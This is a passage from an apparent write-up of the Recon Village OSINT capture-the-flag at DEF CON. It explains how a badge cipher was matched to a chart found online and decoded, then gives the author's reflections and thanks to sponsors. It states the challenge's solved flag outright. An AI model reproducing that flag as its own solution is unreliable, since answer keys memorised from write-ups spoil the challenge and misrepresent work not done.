Points: 300
Description:
Solve the Recon Village Badge Challenge and help us find the username of the hacker.
Skills Required: Identifying ciphers.
Walk-Through
The Russia challenge involved browsing various ciphers on image repositories like Google Images.
While browsing ciphers, we came across one that looked identical to the cipher on the badge. Here’s the original source for the image.
Using this chart, the cipher was decoded using the “Cipher 1” value set. The flag was git:jamescru001.
Concluding Remarks
For the last couple of years, OSINT has become an obsession for me and it is something I take very seriously when conducting red team operations and penetration tests for my day job. I am excited that events like Recon Village are popping up, as I feel OSINT deserves much more recognition. It was great to see people who share a passion for OSINT come together and I expect great things from this village in the years to come. I do hope the folks running DEF CON provide more space for the village next year as it was difficult to attend many of the talks. For those interested, my understanding is the videos will be posted online in the near future.
My only advice on CTF improvements would be more difficult challenges like United States, while still including OSINT requirements, and additional chained investigation challenges like Greenland. These two challenges were our favorites. Australia was also a lot of fun!
A huge thank you to all the people who competed in this year’s Recon Village CTF! We would also like to thank all the sponsors for investing in the village. Without their support, this village and CTF would not have been possible. Thanks for the sweet drone, Hak5 WiFi Pineapple kit, and Maltego and Hunchly licenses!
If anyone has any feedback (good or bad), questions, or needs additional clarification on any of the challenges, please do not hesitate to comment below.
Thanks for reading!